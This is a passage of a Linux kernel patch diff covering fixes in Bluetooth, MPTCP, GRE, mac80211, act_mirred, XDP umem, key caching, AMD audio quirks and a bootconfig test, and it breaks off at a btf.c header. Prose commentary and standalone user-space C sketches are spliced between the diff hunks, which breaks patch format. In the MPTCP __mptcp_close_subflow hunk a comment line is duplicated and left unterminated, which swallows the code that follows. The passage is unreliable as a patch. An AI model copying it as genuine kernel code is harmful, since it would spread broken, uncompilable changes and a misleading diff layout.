+@@ -6078,6 +6118,7 @@ static inline int l2cap_ecred_conn_req(struct l2cap_conn *conn,
+ 		__set_chan_timer(chan, chan->ops->get_sndtimeo(chan));
+ 
+ 		chan->ident = cmd->ident;
++		chan->mode = L2CAP_MODE_EXT_FLOWCTL;
+ 
+ 		if (test_bit(FLAG_DEFER_SETUP, &chan->flags)) {
+ 			l2cap_state_change(chan, BT_CONNECT2);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 0dd30a3beb776..fc4ba0884da96 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -4627,12 +4627,6 @@ static int set_mgmt_mesh_func(struct sock *sk, struct hci_dev *hdev,
+ 				       MGMT_OP_SET_EXP_FEATURE,
+ 				       MGMT_STATUS_INVALID_INDEX);
+ 
+-	/* Changes can only be made when controller is powered down */
+-	if (hdev_is_powered(hdev))
+-		return mgmt_cmd_status(sk, hdev->id,
+-				       MGMT_OP_SET_EXP_FEATURE,
+-				       MGMT_STATUS_REJECTED);
+-
+ 	/* Parameters are limited to a single octet */
+ 	if (data_len != MGMT_SET_EXP_FEATURE_SIZE + 1)
+ 		return mgmt_cmd_status(sk, hdev->id,
+@@ -9352,7 +9346,8 @@ static const struct hci_mgmt_handler mgmt_handlers[] = {
+ 	{ add_ext_adv_data,        MGMT_ADD_EXT_ADV_DATA_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ add_adv_patterns_monitor_rssi,
+-				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE },
++				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE,
++						HCI_MGMT_VAR_LEN },
+ 	{ set_mesh,                MGMT_SET_MESH_RECEIVER_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ mesh_features,           MGMT_MESH_READ_FEATURES_SIZE },
+diff --git a/net/dsa/tag_brcm.c b/net/dsa/tag_brcm.c
+index 16889ea3e0a79..a65d62fb90094 100644
+--- a/net/dsa/tag_brcm.c
++++ b/net/dsa/tag_brcm.c
+@@ -7,6 +7,7 @@
+ 
+ #include <linux/dsa/brcm.h>
+ #include <linux/etherdevice.h>
++#include <linux/if_vlan.h>
+ #include <linux/list.h>
+ #include <linux/slab.h>
+ 
+@@ -248,6 +249,7 @@ static struct sk_buff *brcm_leg_tag_xmit(struct sk_buff *skb,
+ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 					struct net_device *dev)
+ {
++	int len = BRCM_LEG_TAG_LEN;
+ 	int source_port;
+ 	u8 *brcm_tag;
+ 
+@@ -262,12 +264,16 @@ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 	if (!skb->dev)
+ 		return NULL;
+ 
++	/* VLAN tag is added by BCM63xx internal switch */
++	if (netdev_uses_dsa(skb->dev))
++		len += VLAN_HLEN;
++
+ 	/* Remove Broadcom tag and update checksum */
+-	skb_pull_rcsum(skb, BRCM_LEG_TAG_LEN);
++	skb_pull_rcsum(skb, len);
+ 
+ 	dsa_default_offload_fwd_mark(skb);
+ 
+-	dsa_strip_etype_header(skb, BRCM_LEG_TAG_LEN);
++	dsa_strip_etype_header(skb, len);
+ 
+ 	return skb;
+ }
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index cae9f1a4e059f..5b8242265617d 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -552,7 +552,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -561,7 +561,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index c035a96fba3a4..4d5937af08ee9 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -981,7 +981,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -990,7 +990,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/mac80211/wme.c b/net/mac80211/wme.c
+index ecc1de2e68a50..64430949f6857 100644
+--- a/net/mac80211/wme.c
++++ b/net/mac80211/wme.c
+@@ -144,12 +144,14 @@ u16 ieee80211_select_queue_80211(struct ieee80211_sub_if_data *sdata,
+ u16 __ieee80211_select_queue(struct ieee80211_sub_if_data *sdata,
+ 			     struct sta_info *sta, struct sk_buff *skb)
+ {
++	const struct ethhdr *eth = (void *)skb->data;
+ 	struct mac80211_qos_map *qos_map;
+ 	bool qos;
+ 
+ 	/* all mesh/ocb stations are required to support WME */
+-	if (sta && (sdata->vif.type == NL80211_IFTYPE_MESH_POINT ||
+-		    sdata->vif.type == NL80211_IFTYPE_OCB))
++	if ((sdata->vif.type == NL80211_IFTYPE_MESH_POINT &&
++	    !is_multicast_ether_addr(eth->h_dest)) ||
++	    (sdata->vif.type == NL80211_IFTYPE_OCB && sta))
+ 		qos = true;
+ 	else if (sta)
+ 		qos = sta->sta.wme;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 938cccab331dd..f0cde2d7233dc 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -834,7 +834,6 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 	if (sk->sk_socket && !ssk->sk_socket)
+ 		mptcp_sock_graft(ssk, sk->sk_socket);
+ 
+-	mptcp_propagate_sndbuf((struct sock *)msk, ssk);
+ 	mptcp_sockopt_sync_locked(msk, ssk);
+ 	return true;
+ }
+@@ -2358,7 +2357,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		goto out;
+ 	}
+ 
+-	sock_orphan(ssk);
+ 	subflow->disposable = 1;
+ 
+ 	/* if ssk hit tcp_done(), tcp_cleanup_ulp() cleared the related ops
+@@ -2366,14 +2364,22 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	 * reference owned by msk;
+ 	 */
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
++		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
++	} else if (msk->in_accept_queue && msk->first == ssk) {
++		/* If the first subflow moved to a close state (e.g. due to an
++		 * incoming reset) and we reach here before inet_child_forget(),
++		 * the TCP stack could later try to close it via
++		 * inet_csk_listen_stop(), or deliver it to the user space via
++		 * accept().
++		 * We can't delete the subflow - or risk a double free - nor let
++		 * the msk survive - or it will be leaked in the non-accept scenario:
++		 * fallback and let TCP cope with the subflow cleanup.
++		 */
++		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
++		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN) {
+-			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(sk, ssk);
+-			inet_csk_listen_stop(ssk);
+-		}
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+@@ -2413,9 +2419,10 @@ static unsigned int mptcp_sync_mss(struct sock *sk, u32 pmtu)
+ 	return 0;
+ }
+ 
+-static void __mptcp_close_subflow(struct mptcp_sock *msk)
++static void __mptcp_close_subflow(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow, *tmp;
++	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+ 	might_sleep();
+ 
+@@ -2429,7 +2436,15 @@ static void __mptcp_close_subflow(struct mptcp_sock *msk)
+ 		if (!skb_queue_empty_lockless(&ssk->sk_receive_queue))
+ 			continue;
+ 
+-		mptcp_close_ssk((struct sock *)msk, ssk, subflow);
++		mptcp_close_ssk(sk, ssk, subflow);
++	}
++
++	/* if the MPC subflow has been closed before the msk is accepted,
++	/* If the MPC subflow has been closed before the msk is accepted,
++	 * the msk will never be accepted: close it now.
++	if (!msk->first && msk->in_accept_queue) {
++		sock_set_flag(sk, SOCK_DEAD);
++		inet_sk_state_store(sk, TCP_CLOSE);
+ 	}
+ }
+ 
+@@ -2638,6 +2653,9 @@ static void mptcp_worker(struct work_struct *work)
+ 	__mptcp_check_send_data_fin(sk);
+ 	mptcp_check_data_fin(sk);
+ 
++	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		__mptcp_close_subflow(sk);
++
+ 	/* There is no point in keeping around an orphaned sk timedout or
+ 	 * closed, but we need the msk around to reply to incoming DATA_FIN,
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+@@ -2653,9 +2671,6 @@ static void mptcp_worker(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+-		__mptcp_close_subflow(msk);
+-
+ 	if (test_and_clear_bit(MPTCP_WORK_RTX, &msk->flags))
+ 		__mptcp_retrans(sk);
+ 
+@@ -3085,6 +3100,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+ 	msk->subflow = NULL;
++	msk->in_accept_queue = 1;
+ 	WRITE_ONCE(msk->fully_established, false);
+ 	if (mp_opt->suboptions & OPTION_MPTCP_CSUMREQD)
+ 		WRITE_ONCE(msk->csum_enabled, true);
+@@ -3111,8 +3127,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	security_inet_csk_clone(nsk, req);
+ 	bh_unlock_sock(nsk);
+ 
+-	/* keep a single reference */
+-	__sock_put(nsk);
++	/* note: the newly allocated socket refcount is 2 now */
+ 	return nsk;
+ }
+ 
+@@ -3168,8 +3183,6 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 			goto out;
+ 		}
+ 
+-		/* acquire the 2nd reference for the owning socket */
+-		sock_hold(new_mptcp_sock);
+ 		newsk = new_mptcp_sock;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEPASSIVEACK);
+ 	} else {
+@@ -3727,23 +3740,9 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 		struct mptcp_subflow_context *subflow;
+ 		struct sock *newsk = newsock->sk;
+ 
+-		lock_sock(newsk);
++		msk->in_accept_queue = 0;
+ 
+-		/* PM/worker can now acquire the first subflow socket
+-		 * lock without racing with listener queue cleanup,
+-		 * we can notify it, if needed.
+-		 *
+-		 * Even if remote has reset the initial subflow by now
+-		 * the refcnt is still at least one.
+-		 */
+-		subflow = mptcp_subflow_ctx(msk->first);
+-		list_add(&subflow->node, &msk->conn_list);
+-		sock_hold(msk->first);
+-		if (mptcp_is_fully_established(newsk))
+-			mptcp_pm_fully_established(msk, msk->first, GFP_KERNEL);
+-
+-		mptcp_rcv_space_init(msk, msk->first);
+-		mptcp_propagate_sndbuf(newsk, msk->first);
++		lock_sock(newsk);
+ 
+ 		/* set ssk->sk_socket of accept()ed flows to mptcp socket.
+ 		 * This is needed so NOSPACE flag can be set from tcp stack.
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 6f22ae13c9848..051e8022d6611 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -286,7 +286,8 @@ struct mptcp_sock {
+ 	u8		recvmsg_inq:1,
+ 			cork:1,
+ 			nodelay:1,
+-			fastopening:1;
++			fastopening:1,
++			in_accept_queue:1;
+ 	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+@@ -614,7 +615,6 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
+-void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+@@ -651,6 +651,8 @@ void mptcp_subflow_set_active(struct mptcp_subflow_context *subflow);
+ 
+ bool mptcp_subflow_active(struct mptcp_subflow_context *subflow);
+ 
++void mptcp_subflow_drop_ctx(struct sock *ssk);
++
+ static inline void mptcp_subflow_tcp_fallback(struct sock *sk,
+ 					      struct mptcp_subflow_context *ctx)
+ {
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 1e10a38ccf9d0..fc876c2480029 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -355,6 +355,12 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	struct sock *sk = subflow->conn;
+ 
++	/* mptcp_mp_fail_no_response() can reach here on an already closed
++	 * socket
++	 */
++	if (ssk->sk_state == TCP_CLOSE)
++		return;
++
+ 	/* must hold: tcp_done() could drop last reference on parent */
+ 	sock_hold(sk);
+ 
+@@ -630,9 +636,10 @@ static bool subflow_hmac_valid(const struct request_sock *req,
+ 
+ static void mptcp_force_close(struct sock *sk)
+ {
+-	/* the msk is not yet exposed to user-space */
++	/* the msk is not yet exposed to user-space, and refcount is 2 */
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 	sk_common_release(sk);
++	sock_put(sk);
+ }
+ 
+ static void subflow_ulp_fallback(struct sock *sk,
+@@ -648,7 +655,7 @@ static void subflow_ulp_fallback(struct sock *sk,
+ 	mptcp_subflow_ops_undo_override(sk);
+ }
+ 
+-static void subflow_drop_ctx(struct sock *ssk)
++void mptcp_subflow_drop_ctx(struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *ctx = mptcp_subflow_ctx(ssk);
+ 
+@@ -685,6 +692,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_options_received mp_opt;
+ 	bool fallback, fallback_is_fatal;
+ 	struct sock *new_msk = NULL;
++	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+ 	pr_debug("listener=%p, req=%p, conn=%p", listener, req, listener->conn);
+@@ -751,7 +759,7 @@ create_child:
+ 
+ 			if (new_msk)
+ 				mptcp_copy_inaddrs(new_msk, child);
+-			subflow_drop_ctx(child);
++			mptcp_subflow_drop_ctx(child);
+ 			goto out;
+ 		}
+ 
+@@ -759,6 +767,8 @@ create_child:
+ 		ctx->setsockopt_seq = listener->setsockopt_seq;
+ 
+ 		if (ctx->mp_capable) {
++			owner = mptcp_sk(new_msk);
++
+ 			/* this can't race with mptcp_close(), as the msk is
+ 			 * not yet exposed to user-space
+ 			 */
+@@ -767,14 +777,14 @@ create_child:
+ 			/* record the newly created socket as the first msk
+ 			 * subflow, but don't link it yet into conn_list
+ 			 */
+-			WRITE_ONCE(mptcp_sk(new_msk)->first, child);
++			WRITE_ONCE(owner->first, child);
+ 
+ 			/* new mpc subflow takes ownership of the newly
+ 			 * created mptcp socket
+ 			 */
+ 			mptcp_sk(new_msk)->setsockopt_seq = ctx->setsockopt_seq;
+-			mptcp_pm_new_connection(mptcp_sk(new_msk), child, 1);
+-			mptcp_token_accept(subflow_req, mptcp_sk(new_msk));
++			mptcp_pm_new_connection(owner, child, 1);
++			mptcp_token_accept(subflow_req, owner);
+ 			ctx->conn = new_msk;
+ 			new_msk = NULL;
+ 
+@@ -782,15 +792,21 @@ create_child:
+ 			 * uses the correct data
+ 			 */
+ 			mptcp_copy_inaddrs(ctx->conn, child);
++			mptcp_propagate_sndbuf(ctx->conn, child);
++
++			mptcp_rcv_space_init(owner, child);
++			list_add(&ctx->node, &owner->conn_list);
++			sock_hold(child);
+ 
+ 			/* with OoO packets we can reach here without ingress
+ 			 * mpc option
+ 			 */
+-			if (mp_opt.suboptions & OPTIONS_MPTCP_MPC)
++			if (mp_opt.suboptions & OPTIONS_MPTCP_MPC) {
+ 				mptcp_subflow_fully_established(ctx, &mp_opt);
++				mptcp_pm_fully_established(owner, child, GFP_ATOMIC);
++				ctx->pm_notified = 1;
++			}
+ 		} else if (ctx->mp_join) {
+-			struct mptcp_sock *owner;
+-
+ 			owner = subflow_req->msk;
+ 			if (!owner) {
+ 				subflow_add_reset_reason(skb, MPTCP_RST_EPROHIBIT);
+@@ -834,7 +850,7 @@ out:
+ 	return child;
+ 
+ dispose_child:
+-	subflow_drop_ctx(child);
++	mptcp_subflow_drop_ctx(child);
+ 	tcp_rsk(req)->drop_req = true;
+ 	inet_csk_prepare_for_destroy_sock(child);
+ 	tcp_done(child);
+@@ -1748,79 +1764,6 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
+-void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+-{
+-	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+-	struct mptcp_sock *msk, *next, *head = NULL;
+-	struct request_sock *req;
+-
+-	/* build a list of all unaccepted mptcp sockets */
+-	spin_lock_bh(&queue->rskq_lock);
+-	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
+-		struct mptcp_subflow_context *subflow;
+-		struct sock *ssk = req->sk;
+-		struct mptcp_sock *msk;
+-
+-		if (!sk_is_mptcp(ssk))
+-			continue;
+-
+-		subflow = mptcp_subflow_ctx(ssk);
+-		if (!subflow || !subflow->conn)
+-			continue;
+-
+-		/* skip if already in list */
+-		msk = mptcp_sk(subflow->conn);
+-		if (msk->dl_next || msk == head)
+-			continue;
+-
+-		msk->dl_next = head;
+-		head = msk;
+-	}
+-	spin_unlock_bh(&queue->rskq_lock);
+-	if (!head)
+-		return;
+-
+-	/* can't acquire the msk socket lock under the subflow one,
+-	 * or will cause ABBA deadlock
+-	 */
+-	release_sock(listener_ssk);
+-
+-	for (msk = head; msk; msk = next) {
+-		struct sock *sk = (struct sock *)msk;
+-		bool do_cancel_work;
+-
+-		sock_hold(sk);
+-		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
+-		next = msk->dl_next;
+-		msk->first = NULL;
+-		msk->dl_next = NULL;
+-
+-		do_cancel_work = __mptcp_close(sk, 0);
+-		release_sock(sk);
+-		if (do_cancel_work) {
+-			/* lockdep will report a false positive ABBA deadlock
+-			 * between cancel_work_sync and the listener socket.
+-			 * The involved locks belong to different sockets WRT
+-			 * the existing AB chain.
+-			 * Using a per socket key is problematic as key
+-			 * deregistration requires process context and must be
+-			 * performed at socket disposal time, in atomic
+-			 * context.
+-			 * Just tell lockdep to consider the listener socket
+-			 * released here.
+-			 */
+-			mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
+-			mptcp_cancel_work(sk);
+-			mutex_acquire(&listener_sk->sk_lock.dep_map,
+-				      SINGLE_DEPTH_NESTING, 0, _RET_IP_);
+-		}
+-		sock_put(sk);
+-	}
+-
+-	/* we are still under the listener msk socket lock */
+-	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
+-}
+-
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+@@ -1877,6 +1820,13 @@ static void subflow_ulp_release(struct sock *ssk)
+ 		 * when the subflow is still unaccepted
+ 		 */
+ 		release = ctx->disposable || list_empty(&ctx->node);
++
++		/* inet_child_forget() does not call sk_state_change(),
++		 * explicitly trigger the socket close machinery
++		 */
++		if (!release && !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW,
++						  &mptcp_sk(sk)->flags))
++			mptcp_schedule_work(sk);
+ 		sock_put(sk);
+ 	}
+ 
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index b8ad6ae282c02..baeae5e5c8f0c 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
+@@ -28,8 +28,8 @@
+ static LIST_HEAD(mirred_list);
+ static DEFINE_SPINLOCK(mirred_list_lock);
+ 
+-#define MIRRED_RECURSION_LIMIT    4
+-static DEFINE_PER_CPU(unsigned int, mirred_rec_level);
++#define MIRRED_NEST_LIMIT    4
++static DEFINE_PER_CPU(unsigned int, mirred_nest_level);
+ 
+ static bool tcf_mirred_is_act_redirect(int action)
+ {
+@@ -205,12 +205,19 @@ release_idr:
+ 	return err;
+ }
+ 
++static bool is_mirred_nested(void)
++{
++	return unlikely(__this_cpu_read(mirred_nest_level) > 1);
++}
++
+ static int tcf_mirred_forward(bool want_ingress, struct sk_buff *skb)
+ {
+ 	int err;
+ 
+ 	if (!want_ingress)
+ 		err = tcf_dev_queue_xmit(skb, dev_queue_xmit);
++	else if (is_mirred_nested())
++		err = netif_rx(skb);
+ 	else
+ 		err = netif_receive_skb(skb);
+ 
+@@ -224,7 +231,7 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 	struct sk_buff *skb2 = skb;
+ 	bool m_mac_header_xmit;
+ 	struct net_device *dev;
+-	unsigned int rec_level;
++	unsigned int nest_level;
+ 	int retval, err = 0;
+ 	bool use_reinsert;
+ 	bool want_ingress;
+@@ -235,11 +242,11 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 	int mac_len;
+ 	bool at_nh;
+ 
+-	rec_level = __this_cpu_inc_return(mirred_rec_level);
+-	if (unlikely(rec_level > MIRRED_RECURSION_LIMIT)) {
++	nest_level = __this_cpu_inc_return(mirred_nest_level);
++	if (unlikely(nest_level > MIRRED_NEST_LIMIT)) {
+ 		net_warn_ratelimited("Packet exceeded mirred recursion limit on dev %s\n",
+ 				     netdev_name(skb->dev));
+-		__this_cpu_dec(mirred_rec_level);
++		__this_cpu_dec(mirred_nest_level);
+ 		return TC_ACT_SHOT;
+ 	}
+ 
+@@ -308,7 +315,7 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 			err = tcf_mirred_forward(want_ingress, skb);
+ 			if (err)
+ 				tcf_action_inc_overlimit_qstats(&m->common);
+-			__this_cpu_dec(mirred_rec_level);
++			__this_cpu_dec(mirred_nest_level);
+ 			return TC_ACT_CONSUMED;
+ 		}
+ 	}
+@@ -320,7 +327,7 @@ out:
+ 		if (tcf_mirred_is_act_redirect(m_eaction))
+ 			retval = TC_ACT_SHOT;
+ 	}
+-	__this_cpu_dec(mirred_rec_level);
++	__this_cpu_dec(mirred_nest_level);
+ 
+ 	return retval;
+ }
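
The hunk above renames the guard from "recursion" to "nesting" and bounds it with a per-CPU counter that is incremented on entry, checked against a limit, and decremented on every exit path, falling back to netif_rx() when nested. A minimal user-space sketch of the bounded re-entrancy pattern, with a thread-local counter standing in for the kernel's per-CPU variable (illustrative names only):

#include <stdio.h>

#define NEST_LIMIT 4

static _Thread_local unsigned int nest_level;

static int forward(int depth)
{
	int ret = 0;

	if (++nest_level > NEST_LIMIT) {	/* drop instead of recursing */
		fprintf(stderr, "nest limit exceeded at depth %d\n", depth);
		nest_level--;
		return -1;
	}
	if (depth > 0)
		ret = forward(depth - 1);	/* models mirred re-entering itself */
	nest_level--;				/* balanced on every exit path */
	return ret;
}

int main(void)
{
	forward(10);	/* stops at the limit instead of overflowing */
	return 0;
}
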
+diff --git a/net/xdp/xdp_umem.c b/net/xdp/xdp_umem.c
+index 4681e8e8ad943..02207e852d796 100644
+--- a/net/xdp/xdp_umem.c
++++ b/net/xdp/xdp_umem.c
+@@ -150,10 +150,11 @@ static int xdp_umem_account_pages(struct xdp_umem *umem)
+ 
+ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ {
+-	u32 npgs_rem, chunk_size = mr->chunk_size, headroom = mr->headroom;
+ 	bool unaligned_chunks = mr->flags & XDP_UMEM_UNALIGNED_CHUNK_FLAG;
+-	u64 npgs, addr = mr->addr, size = mr->len;
+-	unsigned int chunks, chunks_rem;
++	u32 chunk_size = mr->chunk_size, headroom = mr->headroom;
++	u64 addr = mr->addr, size = mr->len;
++	u32 chunks_rem, npgs_rem;
++	u64 chunks, npgs;
+ 	int err;
+ 
+ 	if (chunk_size < XDP_UMEM_MIN_CHUNK_SIZE || chunk_size > PAGE_SIZE) {
+@@ -188,8 +189,8 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	if (npgs > U32_MAX)
+ 		return -EINVAL;
+ 
+-	chunks = (unsigned int)div_u64_rem(size, chunk_size, &chunks_rem);
+-	if (chunks == 0)
++	chunks = div_u64_rem(size, chunk_size, &chunks_rem);
++	if (!chunks || chunks > U32_MAX)
+ 		return -EINVAL;
+ 
+ 	if (!unaligned_chunks && chunks_rem)
+@@ -202,7 +203,7 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	umem->headroom = headroom;
+ 	umem->chunk_size = chunk_size;
+ 	umem->chunks = chunks;
+-	umem->npgs = (u32)npgs;
++	umem->npgs = npgs;
+ 	umem->pgs = NULL;
+ 	umem->user = NULL;
+ 	umem->flags = mr->flags;
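
The xdp_umem change above widens the chunk and page counts to u64 for the division and then rejects anything that will not fit back into u32, instead of dividing in 32 bits and silently truncating. A sketch of that widen-then-range-check pattern under assumed, simplified names:

#include <stdint.h>
#include <stdio.h>

static int chunk_count(uint64_t size, uint32_t chunk_size, uint32_t *out)
{
	uint64_t chunks;

	if (!chunk_size)
		return -1;
	chunks = size / chunk_size;		/* full 64-bit quotient */
	if (!chunks || chunks > UINT32_MAX)	/* reject before narrowing */
		return -1;
	*out = (uint32_t)chunks;
	return 0;
}

int main(void)
{
	uint32_t n;

	/* a 16 TiB region with 2 KiB chunks would wrap a 32-bit count */
	if (chunk_count(16ULL << 40, 2048, &n))
		puts("rejected: chunk count exceeds u32");
	return 0;
}
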
+diff --git a/security/keys/request_key.c b/security/keys/request_key.c
+index 2da4404276f0f..07a0ef2baacd8 100644
+--- a/security/keys/request_key.c
++++ b/security/keys/request_key.c
+@@ -38,9 +38,12 @@ static void cache_requested_key(struct key *key)
+ #ifdef CONFIG_KEYS_REQUEST_CACHE
+ 	struct task_struct *t = current;
+ 
+-	key_put(t->cached_requested_key);
+-	t->cached_requested_key = key_get(key);
+-	set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	/* Do not cache key if it is a kernel thread */
++	if (!(t->flags & PF_KTHREAD)) {
++		key_put(t->cached_requested_key);
++		t->cached_requested_key = key_get(key);
++		set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	}
+ #endif
+ }
+ 
(The guard above keys off PF_KTHREAD because kernel threads never return to user space, so a key cached for TIF_NOTIFY_RESUME cleanup would be leaked.)
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 36314753923b8..4a69ce702360c 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -255,6 +255,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "15NBC1011"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16z-n000"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/tools/bootconfig/test-bootconfig.sh b/tools/bootconfig/test-bootconfig.sh
+index f68e2e9eef8b2..a2c484c243f5d 100755
+--- a/tools/bootconfig/test-bootconfig.sh
++++ b/tools/bootconfig/test-bootconfig.sh
+@@ -87,10 +87,14 @@ xfail grep -i "error" $OUTFILE
+ 
+ echo "Max node number check"
+ 
+-echo -n > $TEMPCONF
+-for i in `seq 1 1024` ; do
+-   echo "node$i" >> $TEMPCONF
+-done
++awk '
++BEGIN {
++  for (i = 0; i < 26; i += 1)
++      printf("%c\n", 65 + i % 26)
++  for (i = 26; i < 8192; i += 1)
++      printf("%c%c%c\n", 65 + i % 26, 65 + (i / 26) % 26, 65 + (i / 26 / 26))
++}
++' > $TEMPCONF
+ xpass $BOOTCONF -a $TEMPCONF $INITRD
+ 
+ echo "badnode" >> $TEMPCONF
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf.c b/tools/testing/selftests/bpf/prog_tests/btf.c
+index 24dd6214394e0..d711f4bea98ea 100644
